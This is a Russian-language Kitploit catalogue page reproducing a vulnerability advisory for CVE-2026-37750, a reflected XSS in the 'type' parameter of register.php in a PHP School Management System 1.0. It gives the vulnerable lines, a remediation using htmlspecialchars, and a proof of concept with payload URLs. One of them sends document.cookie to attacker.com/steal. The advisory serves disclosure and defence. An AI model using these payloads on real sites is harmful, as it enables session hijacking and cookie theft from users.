Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-37750 — Отражённая PoC-эксплуатация XSS для School Management System 1.0, демонстрирующая неаутентифицированное выполнение JavaScript через параметр type в register.php, с анализом воздействия и рекомендациями по устранению уязвимости. | Kitploit
Инструменты/GitHubGitHub/menevarad007/cve-2026-37750
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьОбучение и Образование
GitHubmenevarad007/cve-2026-37750

CVE-2026-37750

Отражённая PoC-эксплуатация XSS для School Management System 1.0, демонстрирующая неаутентифицированное выполнение JavaScript через параметр type в register.php, с анализом воздействия и рекомендациями по устранению уязвимости.

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-37750 — School Management System 1.0 - Отражённый XSS

Детали

ПолеИнформация
CVE IDCVE-2026-37750
ТипОтражённый межсайтовый скриптинг (XSS)
СерьёзностьСредняя (CVSSv3: 6.1)
Вендорmahmoudai1
ПродуктSchool Management System
Версия1.0
ОбнаружилVarad AP Mene
Дата2026-04-16
CWECWE-79

Описание

Уязвимость отражённого межсайтового скриптинга (XSS) в School Management System 1.0 от mahmoudai1 позволяет неаутентифицированным удалённым злоумышленникам выполнять произвольный JavaScript в браузерах жертв через несанитизированный параметр type в register.php. Параметр отражается без экранирования внутри тега h1 на строке 22 и внутри атрибута action формы на строке 26. Для эксплуатации этой уязвимости аутентификация не требуется.

CVE ID: CVE-2026-37750 CWE: CWE-79 CVSSv3: 6.1 Средняя (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)


Описание продукта

School Management System 1.0 — это PHP/MySQL веб-приложение от mahmoudai1 на GitHub, используемое для управления учениками, учителями и родителями в школах.

URL вендора: https://github.com/mahmoudai1/school-management-system


Уязвимый файл

register.php — Форма регистрации (аутентификация не требуется)


Уязвимый код

Строка 22: echo ucfirst($_REQUEST['type'])

Строка 26: echo $_REQUEST['type']

htmlspecialchars() не используется — необработанный пользовательский ввод отражается напрямую в HTML.


Подтверждение концепции

Предварительные условия:

  • Аутентификация не требуется
  • Цель должна работать под управлением School Management System 1.0

Шаг 1 — Откройте браузер и посетите этот URL: http://target/register.php?type=script-alert-document.cookie-/script

Шаг 2 — JavaScript выполняется в браузере Результат: появляется окно предупреждения, показывающее cookie сессии.

Шаг 3 — Полезная нагрузка для кражи cookie: http://target/register.php?type=script-document.location-http://attacker.com/steal?c=-document.cookie-/script Шаг 4 — Полезная нагрузка для внедрения в атрибут action формы: http://target/register.php?type="-script-alert(1)-/script

Подтверждены две точки внедрения:

Точка внедрения 1 — Внутри тега h1 (строка 22):

root@kitploit:~
echo ucfirst($_REQUEST['type'])

Вывод:

root@kitploit:~
<h1><script>alert(1)</script> Application</h1>

Точка внедрения 2 — Внутри атрибута action формы (строка 26):

root@kitploit:~
echo $_REQUEST['type']

Вывод:

root@kitploit:~
<form action="register.php?type=<script>alert(1)</script>">

Воздействие

  • Угон сессии через кражу cookie
  • Фишинг — внедрение поддельных форм входа
  • Распространение вредоносного ПО через перенаправления
  • Аутентификация не требуется

Исправление

Исправление строки 22: echo htmlspecialchars(ucfirst($_REQUEST['type']), ENT_QUOTES, 'UTF-8');

Исправление строки 26: echo htmlspecialchars($_REQUEST['type'], ENT_QUOTES, 'UTF-8');


Ссылки

  • https://github.com/mahmoudai1/school-management-system
  • https://github.com/mahmoudai1/school-management-system/blob/main/register.php

Обнаружил

Varad AP Mene Email: [email protected] GitHub: https://github.com/menevarad007

Скачать инструмент